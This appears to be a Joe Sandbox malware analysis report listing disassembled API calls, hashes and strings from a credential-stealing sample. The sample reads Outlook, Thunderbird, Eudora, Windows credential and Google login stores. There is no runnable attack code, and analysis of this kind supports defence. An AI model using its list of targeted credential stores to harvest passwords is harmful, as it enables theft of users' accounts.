                                • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$memset
                                • String ID:
                                • API String ID: 438689982-0
                                • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@$memset
                                • String ID:
                                • API String ID: 1860491036-0
                                • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                APIs
                                • memcmp.MSVCRT ref: 00408AF3
                                  • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                  • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                  • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                • memcmp.MSVCRT ref: 00408B2B
                                • memcmp.MSVCRT ref: 00408B5C
                                • memcpy.MSVCRT ref: 00408B79
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcmp$memcpy
                                • String ID:
                                • API String ID: 231171946-0
                                • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: wcslen$wcscat$wcscpy
                                • String ID:
                                • API String ID: 1961120804-0
                                • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                Execution Graph

                                Execution Coverage: 2.4%
                                Dynamic/Decrypted Code Coverage: 20.3%
                                Signature Coverage: 0.5%
                                Total number of Nodes: 848
                                Total number of Limit Nodes: 16
33754->33756 33755->33690 33756->33755 33757 403716 strchr 33756->33757 33757->33755 33758 403730 33757->33758 33952 4021b6 memset 33758->33952 33760 40373f _mbscpy _mbscpy strlen 33761 4037a4 _mbscpy 33760->33761 33762 403789 sprintf 33760->33762 33953 4023e5 16 API calls 33761->33953 33762->33761 33765 4085e2 33764->33765 33954 4082cd 11 API calls 33765->33954 33769 408600 33770 403cba 33769->33770 33771 40860b memset 33769->33771 33782 40821d 33770->33782 33957 410b62 RegEnumKeyExA 33771->33957 33773 4086d2 RegCloseKey 33773->33770 33775 408637 33775->33773 33776 40865c memset 33775->33776 33958 410a9c RegOpenKeyExA 33775->33958 33961 410b62 RegEnumKeyExA 33775->33961 33959 410add RegQueryValueExA 33776->33959 33779 408694 33960 40848b 10 API calls 33779->33960 33781 4086ab RegCloseKey 33781->33775 33962 410a9c RegOpenKeyExA 33782->33962 33784 40823f 33785 403cc6 33784->33785 33786 408246 memset 33784->33786 33794 4086e0 33785->33794 33963 410b62 RegEnumKeyExA 33786->33963 33788 4082bf RegCloseKey 33788->33785 33790 40826f 33790->33788 33964 410a9c RegOpenKeyExA 33790->33964 33965 4080ed 11 API calls 33790->33965 33966 410b62 RegEnumKeyExA 33790->33966 33793 4082a2 RegCloseKey 33793->33790 33967 4045db 33794->33967 33796 4088ef 33975 404656 33796->33975 33800 408737 wcslen 33800->33796 33806 40876a 33800->33806 33801 40877a _wcsncoll 33801->33806 33803 404734 3 API calls 33803->33806 33804 404785 FreeLibrary 33804->33806 33805 408812 memset 33805->33806 33807 40883c memcpy wcschr 33805->33807 33806->33796 33806->33801 33806->33803 33806->33804 33806->33805 33806->33807 33808 4088c3 LocalFree 33806->33808 33978 40466b _mbscpy 33806->33978 33807->33806 33808->33806 33809 410a9c RegOpenKeyExA 33809->33704 33810->33707 33979 410a9c RegOpenKeyExA 33811->33979 33813 402c7a 33814 402da5 33813->33814 33815 402c87 memset 33813->33815 33814->33712 33980 410b62 RegEnumKeyExA 33815->33980 33817 402d9c RegCloseKey 33817->33814 33818 410b1e 3 API calls 33819 402ce4 memset 
sprintf 33818->33819 33981 410a9c RegOpenKeyExA 33819->33981 33821 402d28 33822 402d3a sprintf 33821->33822 33982 402bd1 39 API calls 33821->33982 33983 410a9c RegOpenKeyExA 33822->33983 33827 402cb2 33827->33817 33827->33818 33828 402d9a 33827->33828 33984 402bd1 39 API calls 33827->33984 33985 410b62 RegEnumKeyExA 33827->33985 33828->33817 33829->33715 33830->33719 33831->33723 33833 410816 33832->33833 33834 4107f1 FreeLibrary 33833->33834 33835 403ddd 33834->33835 33835->33728 33986 410a9c RegOpenKeyExA 33836->33986 33838 402ff9 33839 403006 memset 33838->33839 33840 40312c 33838->33840 33987 410b62 RegEnumKeyExA 33839->33987 33840->33732 33842 403122 RegCloseKey 33842->33840 33843 410b1e 3 API calls 33844 403058 memset sprintf 33843->33844 33988 410a9c RegOpenKeyExA 33844->33988 33846 4030a2 memset 33989 410b62 RegEnumKeyExA 33846->33989 33848 410b62 RegEnumKeyExA 33851 403033 33848->33851 33849 4030f9 RegCloseKey 33849->33851 33851->33842 33851->33843 33851->33846 33851->33848 33851->33849 33990 402db3 26 API calls 33851->33990 33853 4032d5 33852->33853 33854 4033a9 33852->33854 33991 4021b6 memset 33853->33991 33867 4034e4 memset memset 33854->33867 33856 4032e1 33992 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33856->33992 33858 4032ea 33859 4032f8 memset GetPrivateProfileSectionA 33858->33859 33993 4023e5 16 API calls 33858->33993 33859->33854 33864 40332f 33859->33864 33861 40339b strlen 33861->33854 33861->33864 33863 403350 strchr 33863->33864 33864->33854 33864->33861 33994 4021b6 memset 33864->33994 33995 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33864->33995 33996 4023e5 16 API calls 33864->33996 33868 410b1e 3 API calls 33867->33868 33869 40353f 33868->33869 33870 40357f 33869->33870 33871 403546 _mbscpy 33869->33871 33875 403985 33870->33875 33997 406d55 strlen _mbscat 33871->33997 33873 403565 _mbscat 33998 4033f0 19 API calls 33873->33998 33999 40466b _mbscpy 33875->33999 33879 4039aa 33880 4039ff 33879->33880 
34000 40f460 memset memset 33879->34000 34021 40f6e2 33879->34021 34039 4038e8 21 API calls 33879->34039 33882 404785 FreeLibrary 33880->33882 33883 403a0b 33882->33883 33884 4037ca memset memset 33883->33884 34047 444551 memset 33884->34047 33887 4038e2 33887->33742 33950 40f334 334 API calls 33887->33950 33889 40382e 33890 406f06 2 API calls 33889->33890 33891 403843 33890->33891 33892 406f06 2 API calls 33891->33892 33893 403855 strchr 33892->33893 33894 403884 _mbscpy 33893->33894 33895 403897 strlen 33893->33895 33896 4038bf _mbscpy 33894->33896 33895->33896 33897 4038a4 sprintf 33895->33897 34059 4023e5 16 API calls 33896->34059 33897->33896 33900 44b090 33899->33900 33901 40fb10 RegOpenKeyExA 33900->33901 33902 403e7f 33901->33902 33903 40fb3b RegOpenKeyExA 33901->33903 33913 40f96c 33902->33913 33904 40fb55 RegQueryValueExA 33903->33904 33905 40fc2d RegCloseKey 33903->33905 33906 40fc23 RegCloseKey 33904->33906 33907 40fb84 33904->33907 33905->33902 33906->33905 33908 404734 3 API calls 33907->33908 33909 40fb91 33908->33909 33909->33906 33910 40fc19 LocalFree 33909->33910 33911 40fbdd memcpy memcpy 33909->33911 33910->33906 34064 40f802 11 API calls 33911->34064 33914 4070ae GetVersionExA 33913->33914 33915 40f98d 33914->33915 33916 4045db 7 API calls 33915->33916 33917 40f9a9 33916->33917 33918 40fae6 33917->33918 33921 40fa13 memset WideCharToMultiByte 33917->33921 33919 404656 FreeLibrary 33918->33919 33920 403e85 33919->33920 33925 4442ea memset 33920->33925 33921->33917 33922 40fa43 _strnicmp 33921->33922 33922->33917 33923 40fa5b WideCharToMultiByte 33922->33923 33923->33917 33924 40fa88 WideCharToMultiByte 33923->33924 33924->33917 33926 410dbb 9 API calls 33925->33926 33927 444329 33926->33927 34065 40759e strlen strlen 33927->34065 33932 410dbb 9 API calls 33933 444350 33932->33933 33934 40759e 3 API calls 33933->33934 33935 44435a 33934->33935 33936 444212 65 API calls 33935->33936 33937 444366 memset memset 33936->33937 33938 410b1e 3 API calls 
33937->33938 33939 4443b9 ExpandEnvironmentStringsA strlen 33938->33939 33940 4443f4 _strcmpi 33939->33940 33941 4443e5 33939->33941 33942 403e91 33940->33942 33943 44440c 33940->33943 33941->33940 33942->33523 33944 444212 65 API calls 33943->33944 33944->33942 33945->33703 33946->33708 33947->33716 33948->33720 33949->33724 33950->33742 33951->33744 33952->33760 33953->33755 33955 40841c 33954->33955 33956 410a9c RegOpenKeyExA 33955->33956 33956->33769 33957->33775 33958->33775 33959->33779 33960->33781 33961->33775 33962->33784 33963->33790 33964->33790 33965->33793 33966->33790 33968 404656 FreeLibrary 33967->33968 33969 4045e3 LoadLibraryA 33968->33969 33970 404651 33969->33970 33971 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33969->33971 33970->33796 33970->33800 33972 40463d 33971->33972 33973 404643 33972->33973 33974 404656 FreeLibrary 33972->33974 33973->33970 33974->33970 33976 403cd2 33975->33976 33977 40465c FreeLibrary 33975->33977 33976->33809 33977->33976 33978->33806 33979->33813 33980->33827 33981->33821 33982->33822 33983->33827 33984->33827 33985->33827 33986->33838 33987->33851 33988->33851 33989->33851 33990->33851 33991->33856 33992->33858 33993->33859 33994->33863 33995->33864 33996->33864 33997->33873 33998->33870 33999->33879 34040 4078ba 34000->34040 34003 4078ba _mbsnbcat 34004 40f5a3 RegOpenKeyExA 34003->34004 34005 40f5c3 RegQueryValueExA 34004->34005 34006 40f6d9 34004->34006 34007 40f6d0 RegCloseKey 34005->34007 34008 40f5f0 34005->34008 34006->33879 34007->34006 34008->34007 34009 40f675 34008->34009 34044 40466b _mbscpy 34008->34044 34009->34007 34045 4012ee strlen 34009->34045 34011 40f611 34013 404734 3 API calls 34011->34013 34018 40f616 34013->34018 34014 40f69e RegQueryValueExA 34014->34007 34015 40f6c1 34014->34015 34015->34007 34016 40f66a 34017 404785 FreeLibrary 34016->34017 34017->34009 34018->34016 34019 40f661 LocalFree 34018->34019 34020 40f645 memcpy 34018->34020 34019->34016 
34020->34019 34046 40466b _mbscpy 34021->34046 34023 40f6fa 34024 4045db 7 API calls 34023->34024 34025 40f708 34024->34025 34026 404734 3 API calls 34025->34026 34033 40f7e2 34025->34033 34028 40f715 34026->34028 34027 404656 FreeLibrary 34029 40f7f1 34027->34029 34030 40f71d CredReadA 34028->34030 34028->34033 34031 404785 FreeLibrary 34029->34031 34030->34033 34034 40f734 34030->34034 34032 40f7fc 34031->34032 34032->33879 34033->34027 34034->34033 34035 40f797 WideCharToMultiByte 34034->34035 34036 40f7b8 strlen 34035->34036 34037 40f7d9 LocalFree 34035->34037 34036->34037 34038 40f7c8 _mbscpy 34036->34038 34037->34033 34038->34037 34039->33879 34041 4078e6 34040->34041 34042 4078c7 _mbsnbcat 34041->34042 34043 4078ea 34041->34043 34042->34041 34043->34003 34044->34011 34045->34014 34046->34023 34060 410a9c RegOpenKeyExA 34047->34060 34049 40381a 34049->33887 34058 4021b6 memset 34049->34058 34050 44458b 34050->34049 34061 410add RegQueryValueExA 34050->34061 34052 4445a4 34053 4445dc RegCloseKey 34052->34053 34062 410add RegQueryValueExA 34052->34062 34053->34049 34055 4445c1 34055->34053 34063 444879 30 API calls 34055->34063 34057 4445da 34057->34053 34058->33889 34059->33887 34060->34050 34061->34052 34062->34055 34063->34057 34064->33910 34066 4075c9 34065->34066 34067 4075bb _mbscat 34065->34067 34068 444212 34066->34068 34067->34066 34085 407e9d 34068->34085 34071 44424d 34072 444274 34071->34072 34073 444258 34071->34073 34093 407ef8 34071->34093 34074 407e9d 9 API calls 34072->34074 34110 444196 52 API calls 34073->34110 34081 4442a0 34074->34081 34076 407ef8 9 API calls 34076->34081 34077 4442ce 34107 407f90 34077->34107 34081->34076 34081->34077 34083 444212 65 API calls 34081->34083 34103 407e62 34081->34103 34082 407f90 FindClose 34084 4442e4 34082->34084 34083->34081 34084->33932 34086 407f90 FindClose 34085->34086 34087 407eaa 34086->34087 34088 406f06 2 API calls 34087->34088 34089 407ebd strlen strlen 34088->34089 34090 407ee1 34089->34090 
34091 407eea 34089->34091 34111 4070e3 strlen _mbscat _mbscpy _mbscat 34090->34111 34091->34071 34094 407f03 FindFirstFileA 34093->34094 34095 407f24 FindNextFileA 34093->34095 34096 407f3f 34094->34096 34097 407f46 strlen strlen 34095->34097 34098 407f3a 34095->34098 34096->34097 34101 407f7f 34096->34101 34099 407f76 34097->34099 34097->34101 34100 407f90 FindClose 34098->34100 34112 4070e3 strlen _mbscat _mbscpy _mbscat 34099->34112 34100->34096 34101->34071 34104 407e94 34103->34104 34105 407e6c strcmp 34103->34105 34104->34081 34105->34104 34106 407e83 strcmp 34105->34106 34106->34104 34108 407fa3 34107->34108 34109 407f99 FindClose 34107->34109 34108->34082 34109->34108 34110->34071 34111->34091 34112->34101 34113->33536 34114->33540 34115->33546 34116->33547 34117->33553 34118->33550 34119->33545 34128 411853 RtlInitializeCriticalSection memset 34129 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34303 40a256 13 API calls 34305 432e5b 17 API calls 34307 43fa5a 20 API calls 34131 401060 41 API calls 34310 427260 CloseHandle memset memset 33210 410c68 FindResourceA 33211 410c81 SizeofResource 33210->33211 33212 410cae 33210->33212 33211->33212 33213 410c92 LoadResource 33211->33213 33213->33212 33214 410ca0 LockResource 33213->33214 33214->33212 34312 405e69 14 API calls 34136 433068 15 API calls __fprintf_l 34314 414a6d 18 API calls 34315 43fe6f 134 API calls 34138 424c6d 15 API calls __fprintf_l 34316 426741 19 API calls 34140 440c70 17 API calls 34141 443c71 44 API calls 34144 427c79 24 API calls 34319 416e7e memset __fprintf_l 34148 42800b 47 API calls 34149 425115 85 API calls __fprintf_l 34322 41960c 61 API calls 34150 43f40c 122 API calls __fprintf_l 34153 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34154 43f81a 20 API calls 34156 414c20 memset memset 34157 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34326 414625 18 API calls 34327 404225 modf 34328 403a26 strlen WriteFile 34330 
40422a 12 API calls 34334 427632 memset memset memcpy 34335 40ca30 59 API calls 34336 404235 26 API calls 34158 42ec34 61 API calls __fprintf_l 34159 425115 76 API calls __fprintf_l 34337 425115 77 API calls __fprintf_l 34339 44223a 38 API calls 34165 43183c 112 API calls 34340 44b2c5 _onexit __dllonexit 34345 42a6d2 memcpy __allrem 34167 405cda 65 API calls 34353 43fedc 138 API calls 34354 4116e1 16 API calls __fprintf_l 34170 4244e6 19 API calls 34172 42e8e8 127 API calls __fprintf_l 34173 4118ee RtlLeaveCriticalSection 34359 43f6ec 22 API calls 34175 425115 119 API calls __fprintf_l 33200 410cf3 EnumResourceNamesA 34362 4492f0 memcpy memcpy 34364 43fafa 18 API calls 34366 4342f9 15 API calls __fprintf_l 34176 4144fd 19 API calls 34368 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34369 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34372 443a84 _mbscpy 34374 43f681 17 API calls 34179 404487 22 API calls 34376 415e8c 16 API calls __fprintf_l 34183 411893 RtlDeleteCriticalSection __fprintf_l 34184 41a492 42 API calls 34380 403e96 34 API calls 34381 410e98 memset SHGetPathFromIDList SendMessageA 34186 426741 109 API calls __fprintf_l 34187 4344a2 18 API calls 34188 4094a2 10 API calls 34190 4108a4 memcpy UuidFromStringA UuidFromStringA UuidFromStringA memcpy 34384 4116a6 15 API calls __fprintf_l 34385 43f6a4 17 API calls 34386 440aa3 20 API calls 34388 427430 45 API calls 34192 4090b0 7 API calls 34193 4148b0 15 API calls 34195 4118b4 RtlEnterCriticalSection 34196 4014b7 CreateWindowExA 34197 40c8b8 19 API calls 34199 4118bf RtlTryEnterCriticalSection 34393 42434a 18 API calls __fprintf_l 34395 405f53 12 API calls 34207 43f956 59 API calls 34209 40955a 17 API calls 34210 428561 36 API calls 34211 409164 7 API calls 34399 404366 19 API calls 34403 40176c ExitProcess 34406 410777 42 API calls 34216 40dd7b 51 API calls 34217 425d7c 16 API calls __fprintf_l 34408 43f6f0 25 API calls 34409 42db01 22 API calls 34218 412905 15 API 
calls __fprintf_l 34410 403b04 54 API calls 34411 405f04 SetDlgItemTextA GetDlgItemTextA 34412 44b301 ??3@YAXPAX 34415 4120ea 14 API calls 3 library calls 34416 40bb0a 8 API calls 34418 413f11 strcmp 34222 434110 17 API calls __fprintf_l 34225 425115 108 API calls __fprintf_l 34419 444b11 _onexit 34227 425115 76 API calls __fprintf_l 34230 429d19 10 API calls 34422 444b1f __dllonexit 34423 409f20 _strcmpi 34232 42b927 31 API calls 34426 433f26 19 API calls __fprintf_l 34427 44b323 FreeLibrary 34428 427f25 46 API calls 34429 43ff2b 17 API calls 34430 43fb30 19 API calls 34239 414d36 16 API calls 34241 40ad38 7 API calls 34432 433b38 16 API calls __fprintf_l 34433 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34245 426741 21 API calls 34246 40c5c3 125 API calls 34248 43fdc5 17 API calls 34434 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34251 4161cb memcpy memcpy memcpy memcpy 33215 44b3cf 33216 44b3e6 33215->33216 33218 44b454 33215->33218 33216->33218 33222 44b40e 33216->33222 33219 44b405 33219->33218 33220 44b435 VirtualProtect 33219->33220 33220->33218 33221 44b444 VirtualProtect 33220->33221 33221->33218 33223 44b413 33222->33223 33225 44b454 33223->33225 33229 44b42b 33223->33229 33226 44b41c 33226->33225 33227 44b435 VirtualProtect 33226->33227 33227->33225 33228 44b444 VirtualProtect 33227->33228 33228->33225 33230 44b431 33229->33230 33231 44b435 VirtualProtect 33230->33231 33233 44b454 33230->33233 33232 44b444 VirtualProtect 33231->33232 33231->33233 33232->33233 34439 43ffc8 18 API calls 34252 4281cc 15 API calls __fprintf_l 34441 4383cc 110 API calls __fprintf_l 34253 4275d3 41 API calls 34442 4153d3 22 API calls __fprintf_l 34254 444dd7 _XcptFilter 34447 4013de 15 API calls 34449 425115 111 API calls __fprintf_l 34450 43f7db 18 API calls 34453 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34256 4335ee 16 API calls __fprintf_l 34455 429fef 11 API calls 34257 444deb _exit _c_exit 34456 40bbf0 138 API calls 34260 425115 
79 API calls __fprintf_l 34460 437ffa 22 API calls 34264 4021ff 14 API calls 34265 43f5fc 149 API calls 34461 40e381 9 API calls 34267 405983 40 API calls 34268 42b186 27 API calls __fprintf_l 34269 427d86 76 API calls 34270 403585 20 API calls 34272 42e58e 18 API calls __fprintf_l 34275 425115 75 API calls __fprintf_l 34277 401592 8 API calls 33201 410b92 33204 410a6b 33201->33204 33203 410bb2 33205 410a77 33204->33205 33206 410a89 GetPrivateProfileIntA 33204->33206 33209 410983 memset _itoa WritePrivateProfileStringA 33205->33209 33206->33203 33208 410a84 33208->33203 33209->33208 34465 434395 16 API calls 34279 441d9c memcmp 34467 43f79b 119 API calls 34280 40c599 43 API calls 34468 426741 87 API calls 34284 4401a6 21 API calls 34286 426da6 memcpy memset memset memcpy 34287 4335a5 15 API calls 34289 4299ab memset memset memcpy memset memset 34290 40b1ab 8 API calls 34473 425115 76 API calls __fprintf_l 34477 4113b2 18 API calls 2 library calls 34481 40a3b8 memset sprintf SendMessageA 33234 410bbc 33237 4109cf 33234->33237 33238 4109dc 33237->33238 33239 410a23 memset GetPrivateProfileStringA 33238->33239 33240 4109ea memset 33238->33240 33245 407646 strlen 33239->33245 33250 4075cd sprintf memcpy 33240->33250 33243 410a0c WritePrivateProfileStringA 33244 410a65 33243->33244 33246 40765a 33245->33246 33248 40765c 33245->33248 33246->33244 33247 4076a3 33247->33244 33248->33247 33251 40737c strtoul 33248->33251 33250->33243 33251->33248 34292 40b5bf memset memset _mbsicmp

                                Control-flow Graph

                                APIs
                                • memset.MSVCRT ref: 0040832F
                                • memset.MSVCRT ref: 00408343
                                • memset.MSVCRT ref: 0040835F
                                • memset.MSVCRT ref: 00408376
                                • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                • strlen.MSVCRT ref: 004083E9
                                • strlen.MSVCRT ref: 004083F8
                                • memcpy.MSVCRT ref: 0040840A
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                • String ID: 5$H$O$b$i$}$}
                                APIs
                                • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                • strlen.MSVCRT ref: 00407F5C
                                • strlen.MSVCRT ref: 00407F64
                                Strings
                                Similarity
                                • API ID: FileFindstrlen$FirstNext
                                • String ID: ACD

                                Control-flow Graph

                                APIs
                                • memset.MSVCRT ref: 00401E8B
                                • strlen.MSVCRT ref: 00401EA4
                                • strlen.MSVCRT ref: 00401EB2
                                • strlen.MSVCRT ref: 00401EF8
                                • strlen.MSVCRT ref: 00401F06
                                • memset.MSVCRT ref: 00401FB1
                                • atoi.MSVCRT ref: 00401FE0
                                • memset.MSVCRT ref: 00402003
                                • sprintf.MSVCRT ref: 00402030
                                  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                • memset.MSVCRT ref: 00402086
                                • memset.MSVCRT ref: 0040209B
                                • strlen.MSVCRT ref: 004020A1
                                • strlen.MSVCRT ref: 004020AF
                                • strlen.MSVCRT ref: 004020E2
                                • strlen.MSVCRT ref: 004020F0
                                • memset.MSVCRT ref: 00402018
                                  • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                • _mbscpy.MSVCRT ref: 00402177
                                • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                Strings
                                Similarity
                                • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                  • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                  • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                  • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                                • DeleteObject.GDI32(?), ref: 0040D1A6
                                Strings
                                Similarity
                                • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                • _mbscpy.MSVCRT ref: 00403E54
                                Strings
                                • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                • PStoreCreateInstance, xrefs: 00403C44
                                • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                • pstorec.dll, xrefs: 00403C30
                                • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                Similarity
                                • API ID: Library$AddressFreeLoadProc_mbscpy
                                • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account

                                Control-flow Graph

                                control_flow_graph 231 40fb00-40fb35 call 44b090 RegOpenKeyExA 234 40fc37-40fc3d 231->234 235 40fb3b-40fb4f RegOpenKeyExA 231->235 236 40fb55-40fb7e RegQueryValueExA 235->236 237 40fc2d-40fc31 RegCloseKey 235->237 238 40fc23-40fc27 RegCloseKey 236->238 239 40fb84-40fb93 call 404734 236->239 237->234 238->237 239->238 242 40fb99-40fbd1 call 4047a5 239->242 242->238 245 40fbd3-40fbdb 242->245 246 40fc19-40fc1d LocalFree 245->246 247 40fbdd-40fc14 memcpy * 2 call 40f802 245->247 246->238 247->246
                                APIs
                                • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                • memcpy.MSVCRT ref: 0040FBE4
                                • memcpy.MSVCRT ref: 0040FBF9
